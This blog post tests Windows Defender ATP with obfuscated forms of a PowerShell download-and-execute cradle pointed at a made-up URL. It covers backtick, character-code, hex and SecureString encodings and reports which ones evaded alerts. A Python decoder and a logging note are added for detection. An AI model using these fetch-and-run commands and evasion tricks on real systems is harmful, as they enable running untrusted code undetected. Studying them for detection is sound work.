Obfuscating PowerShell Commands

While testing Windows Defender Advanced Threat Protection (WDATP), I ran various PowerShell scripts to invoke certain downloads or specific tasks. As I was doing it, I wondered if it was smart enough to see obfuscated commands. Then I wondered how I could obfuscate them to make it harder to understand.

As an example, I will use the following command line with a made-up URL:

Invoke-Expression (New-Object System.Net.WebClient).DownloadString("https://bit.ly/sample")

The command simply retrieves the file from the specified URL and loads it into the current PowerShell session. WDATP easily recognizes this standard command and flags it. What if we try a few different obfuscation approaches? The examples below are taken from Daniel Bohannon's RVAsec 2017 slides: http://rvasec.com/slides/2017/Bohannon_Daniel–RVAsec_2017.pptx

Easy Obfuscation
The URL is split into concatenated fragments, and the method name is broken up with backticks. The backtick is PowerShell's escape character; placed before any character that does not form an escape sequence it is simply dropped by the parser, so the method name still resolves to DownloadString.

Invoke-Expression (New-Object Net.WebClient).DownloadString("htt" + "ps://" + "bit.ly/sample")

Invoke-Expression (New-Object Net.WebClient).DownloadString('htt' + 'ps://' + 'bit.ly/sample')

Invoke-Expression (New-Object Net.WebClient)."`D`o`wn`l`oa`d`Str`in`g"('htt' + 'ps://' + 'bit.ly/sample')

Medium Obfuscation
Every character is now ticked, and the type name is ticked as well. Note the uppercase N, A, T and R: lowercase `n, `a, `t and `r are real escape sequences (newline, alert, tab, carriage return), so those letters must be uppercased to keep the string intact. The last variant also avoids typing New-Object by resolving it at run time with a wildcard through Get-Command (gcm).

Invoke-Expression (New-Object Net.WebClient)."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"('htt' + 'ps://' + 'bit.ly/sample')

Invoke-Expression (New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`t")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"('htt' + 'ps://' + 'bit.ly/sample')

Invoke-Expression (& (`G`C`M *w-O*) "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"( 'ht'+'tps://' + 'bit.ly/sample')

Hard Obfuscation
The cmdlet name itself can be ticked, and in the second variant Invoke-Expression disappears entirely: the downloaded string is turned into a script block through $ExecutionContext.InvokeCommand.NewScriptBlock() and dot-sourced.

`I`N`V`o`k`e`-`E`x`p`R`e`s`s`i`o`N (& (`G`C`M *w-O*) "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"( 'ht'+'tps://bit.ly/sample')

. ((${`E`x`e`c`u`T`i`o`N`C`o`N`T`e`x`T}."`I`N`V`o`k`e`C`o`m`m`A`N`d"). "`N`e`w`S`c`R`i`p`T`B`l`o`c`k"((& (`G`C`M *w-O*) "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"( 'ht'+'tps://bit.ly/sample')))

Interestingly, I did not see these get flagged and show up in the console. However, when I ran it this way it did:

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://bit.ly/sample')"

Even using the "Invoke-Obfuscation" framework with something like the following didn't raise the alert.

ASCII Encoding
The command is stored as decimal character codes. The launcher (gv '*MDr*').Name[3,11,2]-join'' indexes the variable name MaximumDriveCount to spell iex.

[StRiNg]::JoIn( '' , [ChaR[]](73, 110, 118 ,111,107,101, 45 , 69, 120 ,112, 114 , 101, 115 ,115 , 105,111, 110,32,40,78 , 101 ,119, 45, 79 , 98 ,106 , 101 , 99 ,116, 32 , 83, 121,115 , 116, 101,109 , 46 , 78 , 101 ,116, 46,87,101, 98 ,67 ,108,105,101 , 110, 116,41 , 46, 68 , 111 , 119, 110 ,108 ,111, 97,100 ,83 , 116 , 114, 105 ,110, 103, 40 ,39, 104 ,116 , 116, 112 ,58,47,47 ,98 , 105,116,46 , 108 , 121, 47 , 115, 97, 109 , 112,108, 101 ,39, 41 ))|& ((gv '*MDr*').NamE[3,11,2]-joiN'')

HEX Encoding
Same idea with hexadecimal values, some quoted and some bare, converted one by one with [Convert]::ToInt16($_, 16). Here $ShellId[1]+$ShellId[13]+'x' indexes "Microsoft.PowerShell" to spell iex.

&( $sHeLlId[1]+$SHeLLiD[13]+'x')(( ( 49, '6e' , 76, '6f','6b', 65,'2d',45 , 78, 70, 72,65 , 73, 73,69, '6f' , '6e' ,20,28,'4e' ,65 , 77, '2d', '4f' ,62, '6a', 65,63 ,74 , 20 , 53 , 79,73 ,74,65,'6d','2e','4e' , 65 ,74 , '2e' , 57,65, 62,43,'6c' ,69, 65,'6e', 74,29 ,'2e', 44 , '6f' , 77, '6e','6c' , '6f' ,61, 64, 53,74 , 72 ,69 , '6e' , 67, 28, 27, 68 , 74,74, 70 , '3a' , '2f' , '2f',62 , 69, 74 ,'2e' , '6c', 79,'2f' ,73, 61 , '6d' , 70 ,'6c',65, 27, 29)|foreAcH-objeCt {([COnvERT]::tOiNT16(( $_.TOSTrinG()), 16 )-as [chAR])} ) -JOin '')

SecureString (AES) Encoding
The command is encrypted with ConvertTo-SecureString and the 16-byte key (242..227) supplied inline, then decrypted through the Marshal class. $PSHome[4]+$PSHome[34]+'x' indexes the default install path C:\Windows\System32\WindowsPowerShell\v1.0 to spell iex.

.( $PsHOMe[4]+$PsHoMe[34]+'x')(([ruNtiMe.inteROpseRViCes.MaRsHaL]::ptRtoStRinGuNi( [RuNTime.iNTERoPservIcES.marSHAL]::SecureStrinGToGLoBalaLLocuniCoDE($('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'| cOnVeRTTo-secUrestRING -KE (242..227)) )) ))

SecureString (AES) Encoding Compressed
The payload is additionally Deflate-compressed and Base64-encoded. ([string]$VerbosePreference)[1,3]+'x' indexes the default value SilentlyContinue to spell iex.

(new-oBJect iO.COMPRESsiOn.deflATESTreAM( [Io.MEMoRyStreAm][SYStEm.convert]::FROmbASE64stRing('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'), [iO.CoMPresSiON.cOMPresSIoNmoDE]::dEcoMPreSs) |fOrEAch{ new-oBJect Io.sTREAmReadER($_ ,[SYSteM.tExT.eNcODinG]::AsciI) } ).readtoEND( ) | & ( ([sTRInG]$VErBOSeprEFerENCE)[1,3]+'x'-Join'')
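The ASCII and HEX encodings above are reversible offline: the numeric arrays are the plaintext code points, and the launcher expressions index well-known strings to spell iex. The Python below is an added example, not the post's own code or Invoke-Obfuscation's: it decodes either array shape and resolves the $ShellId / $PSHome index launcher against default values assumed for a stock Windows PowerShell 5.1 install ($PSHome differs on other installs, so that table is an assumption). The two samples are the page's ASCII and HEX commands with straight quotes. The SecureString variants carry their key inline, but the ciphertext is not reproduced on the page, so they are not handled here.

```python
import re

# `[char[]](73, 110, ...)`: decimal code points, any spacing.
_CHAR_ARRAY = re.compile(r"\[\s*char\s*\[\s*\]\s*\]\s*\(\s*([\d\s,]+)\)", re.I)

# Hex variant: a list of bare or quoted hex values piped into
# ForEach-Object { [Convert]::ToInt16($_, 16) -as [char] }.
_HEX_ITEM = r"(?:'[0-9a-f]+'|\"[0-9a-f]+\"|[0-9a-f]+)"
_HEX_ARRAY = re.compile(
    r"\(\s*(" + _HEX_ITEM + r"(?:\s*,\s*" + _HEX_ITEM + r")+)\s*\)\s*\|\s*foreach", re.I)

# Default values on a stock Windows PowerShell 5.1 install (assumption; $PSHome
# varies by edition). The MaximumDriveCount and $VerbosePreference launchers use
# slice syntax ([3,11,2], [1,3]) and would need the same idea with several indices.
_KNOWN_STRINGS = {
    "shellid": "Microsoft.PowerShell",
    "pshome": r"C:\Windows\System32\WindowsPowerShell\v1.0",
}
_INDEX_LAUNCHER = re.compile(
    r"\$(\w+)\[(\d+)\]\s*\+\s*\$(\w+)\[(\d+)\]\s*\+\s*'x'", re.I)


def decode_char_array(cmd):
    """Decode the first `[char[]](n, n, ...)` array in cmd, or None."""
    m = _CHAR_ARRAY.search(cmd)
    if not m:
        return None
    return "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip())


def decode_hex_array(cmd):
    """Decode the first hex list that feeds a ToInt16(..., 16) loop, or None."""
    m = _HEX_ARRAY.search(cmd)
    if not m:
        return None
    items = [x.strip().strip("'\"") for x in m.group(1).split(",")]
    return "".join(chr(int(x, 16)) for x in items)


def recover_payload(cmd):
    """Return the plaintext command hidden by either encoding, or None."""
    return decode_char_array(cmd) or decode_hex_array(cmd)


def resolve_launcher(cmd):
    """Resolve `$ShellId[1]+$ShellId[13]+'x'`-style launchers to a cmdlet/alias
    name (e.g. 'iex'); None if the variable is unknown or the index is out of range."""
    m = _INDEX_LAUNCHER.search(cmd)
    if not m:
        return None
    out = ""
    for name, idx in ((m.group(1), m.group(2)), (m.group(3), m.group(4))):
        value = _KNOWN_STRINGS.get(name.lower())
        if value is None or int(idx) >= len(value):
            return None
        out += value[int(idx)]
    return out + "x"


# The page's two samples, transcribed with straight quotes.
ASCII_SAMPLE = """[StRiNg]::JoIn( '' , [ChaR[]](73, 110, 118 ,111,107,101, 45 , 69, 120 ,112, 114 , 101, 115 ,115 , 105,111, 110,32,40,78 , 101 ,119, 45, 79 , 98 ,106 , 101 , 99 ,116, 32 , 83, 121,115 , 116, 101,109 , 46 , 78 , 101 ,116, 46,87,101, 98 ,67 ,108,105,101 , 110, 116,41 , 46, 68 , 111 , 119, 110 ,108 ,111, 97,100 ,83 , 116 , 114, 105 ,110, 103, 40 ,39, 104 ,116 , 116, 112 ,58,47,47 ,98 , 105,116,46 , 108 , 121, 47 , 115, 97, 109 , 112,108, 101 ,39, 41 ))|& ((gv '*MDr*').NamE[3,11,2]-joiN'')"""

HEX_SAMPLE = """&( $sHeLlId[1]+$SHeLLiD[13]+'x')(( ( 49, '6e' , 76, '6f','6b', 65,'2d',45 , 78, 70, 72,65 , 73, 73,69, '6f' , '6e' ,20,28,'4e' ,65 , 77, '2d', '4f' ,62, '6a', 65,63 ,74 , 20 , 53 , 79,73 ,74,65,'6d','2e','4e' , 65 ,74 , '2e' , 57,65, 62,43,'6c' ,69, 65,'6e', 74,29 ,'2e', 44 , '6f' , 77, '6e','6c' , '6f' ,61, 64, 53,74 , 72 ,69 , '6e' , 67, 28, 27, 68 , 74,74, 70 , '3a' , '2f' , '2f',62 , 69, 74 ,'2e' , '6c', 79,'2f' ,73, 61 , '6d' , 70 ,'6c',65, 27, 29)|foreAcH-objeCt {([COnvERT]::tOiNT16(( $_.TOSTrinG()), 16 )-as [chAR])} ) -JOin '')"""

if __name__ == "__main__":
    for sample in (ASCII_SAMPLE, HEX_SAMPLE):
        print(resolve_launcher(sample), "->", recover_payload(sample))
```

Both samples decode to the same Invoke-Expression download cradle as the original command, so a detector that decodes numeric arrays before matching is not fooled by either encoding. On the endpoint itself, PowerShell script block logging (event 4104) records each script block as it is compiled, so the decoded string that Invoke-Expression receives is logged in the clear as its own block even when the outer command line is not.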

To learn more about obfuscating PowerShell commands you can use the following links:

https://github.com/danielbohannon/Invoke-Obfuscation
https://www.sans.org/summit-archives/file/summit-archive-1492186586.pdf
https://blog.varonis.com/powershell-obfuscation-stealth-through-confusion-part-i/
https://blog.varonis.com/powershell-obfuscation-stealth-confusion-part-ii/
http://pentestit.com/invoke-obfuscation-powershell-command-script-obfuscator/
https://cobbr.io/ObfuscationDetection.html
https://gallery.technet.microsoft.com/scriptcenter/Generate-obfuscated-string-6ec72ffe

Now the good news is that if these were more malicious in nature than just downloading a file, they would be flagged. For example, using this method to download Mimikatz will trigger an alert.

Liam Cleary

I work as an Associate Director for Protiviti in Virginia. My main focus is to ensure that SharePoint can either natively or with minimal customization meet the business requirement securely. I am currently a SharePoint MVP focused on Architecture but also cross the boundary into Development and Security. I am often found at user groups and conferences speaking, offering advice, spending time in the community, teaching my kids how to code, Raspberry Pi programming, hacking the planet and sometimes building Lego robots.
